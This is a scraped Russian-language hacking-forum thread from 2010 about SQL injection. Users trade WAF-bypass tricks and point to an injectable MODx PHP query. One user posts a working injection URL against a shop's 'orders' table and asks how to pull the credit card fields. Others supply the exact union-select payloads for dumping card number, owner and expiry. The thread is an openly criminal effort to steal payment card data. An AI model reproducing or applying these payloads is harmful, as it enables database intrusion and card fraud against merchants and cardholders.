Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.06.2010, 23:31
|
|
Новичок
Регистрация: 10.08.2009
Сообщений: 16
Провел на форуме:
27247
Репутация:
1
|
|
Сообщение от wildshaman
или
/*!UnIoN+SeLeCt*/
UnIoN/**/SeLeCt
респект
/*!UnIoN+SeLeCt*/)) лови +
|
|
|
16.06.2010, 23:33
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
респект /*!UnIoN+SeLeCt*/)) лови +
думаю скоро он опять появится...
т.к. дальше наверно тож будет фильтр
|
|
|
|
16.06.2010, 23:34
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
На хакер.ру ошиблись? Или сайт для примера с закрытой дыркой?
|
|
|
|
16.06.2010, 23:36
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Может, дашь акк тестовый? Ибо без логина там и крутить нечего
|
|
|
|
16.06.2010, 23:56
|
|
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме:
367442
Репутация:
41
|
|
Сообщение от CyberHunter
На хакер.ру ошиблись? Или сайт для примера с закрытой дыркой?
Инъекция есть...
Но чтобы ее использовать надо как минимум
1) доступ в админку
2) magic_quotes = Off
mutate_templates.dynamic.php
PHP код:
if ($_REQUEST['a'] == 16) {
$sql = "SELECT tv.name as 'name', tv.id as 'id', tr.templateid, tr.rank, if(isnull(cat.category),'".$_lang['no_category']."',cat.category) as category
FROM ".$modx->getFullTableName('site_tmplvar_templates')." tr
INNER JOIN ".$modx->getFullTableName('site_tmplvars')." tv ON tv.id = tr.tmplvarid
LEFT JOIN ".$modx->getFullTableName('categories')." cat ON tv.category = cat.id
WHERE tr.templateid='".$_REQUEST['id']."' ORDER BY tr.rank ASC";
$rs = $modx->db->query($sql);
|
|
|
|
17.06.2010, 01:33
|
|
Новичок
Регистрация: 10.08.2009
Сообщений: 16
Провел на форуме:
27247
Репутация:
1
|
|
вот что получилось
http://www.site.com/info.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,/*!concat*/(column_name)+/*!from*/+/*!information_schema*/./*!columns*/+/*!where*/+/*!table_name*/=0x6f7264657273+limit+36,1--
выдрал данные из таблицы orders выдралось cc_type, cc_number, cc_owner, cc_expires, cvv нету походу, теперь как получить эти самые данные сс?
зы голова не соображает ладно "утро вечера мудренее"
|
|
|
|
17.06.2010, 02:17
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181
Репутация:
688
|
|
Сообщение от manerus
вот что получилось
http://www.site.com/info.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,/*!concat*/(column_name)+/*!from*/+/*!information_schema*/./*!columns*/+/*!where*/+/*!table_name*/=0x6f7264657273+limit+36,1--
выдрал данные из таблицы orders выдралось cc_type, cc_number, cc_owner, cc_expires, cvv нету походу, теперь как получить эти самые данные сс?
зы голова не соображает ладно "утро вечера мудренее"
concat_ws (0x3a,cc_type,cc_number,cc_owner,cc_expires) from orders
|
|
|
|
17.06.2010, 02:21
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
http://www.site.com/info.php?id=-1+/*!UnIoN+SeLeCt+concat_ws(0x3a,cc_type,cc_number,cc _owner,cc_expires),2,3,4+from+orders+limit+0,1*/+--+
Если принтабельна первая колонка
И не извращайся с псевдокомментами, хватит одного для обхода WAF
|
|
|
|
17.06.2010, 16:12
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
хотел бы спросить. как нибудь можно вызвать ошибки на сайте чтоб узнать полный путь. если сайт на ASP
|
|
|
|
17.06.2010, 16:35
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от pinch
хотел бы спросить. как нибудь можно вызвать ошибки на сайте чтоб узнать полный путь. если сайт на ASP
https://forum.antichat.ru/threadnav31427-1-10.html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
